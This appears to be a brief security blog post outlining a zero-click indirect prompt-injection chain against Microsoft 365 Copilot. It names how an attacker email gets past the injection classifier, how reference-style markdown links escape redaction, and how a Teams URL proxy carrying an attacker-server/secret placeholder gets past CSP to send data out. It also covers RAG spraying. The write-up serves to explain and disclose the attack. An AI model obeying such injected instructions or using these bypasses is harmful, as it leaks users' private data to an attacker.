In this blog you learn about M365 copilot vulnerability.
Zero-click attack chain results in compromising of Copilot data integrity
High Level
OWASP Top 10
- Indirect prompt Injection
Exploitation technique
- LLM Scope Violation
Risk
- Data Exfiltration
Vulnerabilities
- Bypassing XPIA Classifiers [AI Vulnerability]
- Bypassing external link Redaction [Traditional Vulnerability]
- Bypassing CSP [Traditional Vulnerability]
Security Measures
- Runtime Guardrails
- DLP
Brief Explanation
What is LLM Scope Violation
The term describes situations where an attacker’s specific instructions to the LLM (which originate in untrusted inputs) make the LLM attend to trusted data in the model’s context, without the user’s explicit consent
Attack Chain [How attack was performed]
- Bypassing Cross Prompt Injection [XPIA] . This was bypassed by directing email to recipient rather than LLM. MS Guardrail wasn’t good enough[AI Vulnerability]
- Bypassing Link Redaction, Reference-style markdown links are not redacted and are not recognized by Microsoft [Traditional Vulnerability]
- Bypassing CSP by using MS Team domain”https://eu-prod.asyncgw.teams.microsoft.com/urlp/v1/url/content?url=<attacker*_server>/<secret>&v=1*” [Traditional Vulnerability]
Exploitation
- RAG Spraying, distributing chunk their malicious content across many points in the latent space
- Attacker Email [Underprivileged program] accessing privileged data. Reaching attacker domain with Sensitive Data as parameters.
Cyber Security Shots 
Leave a comment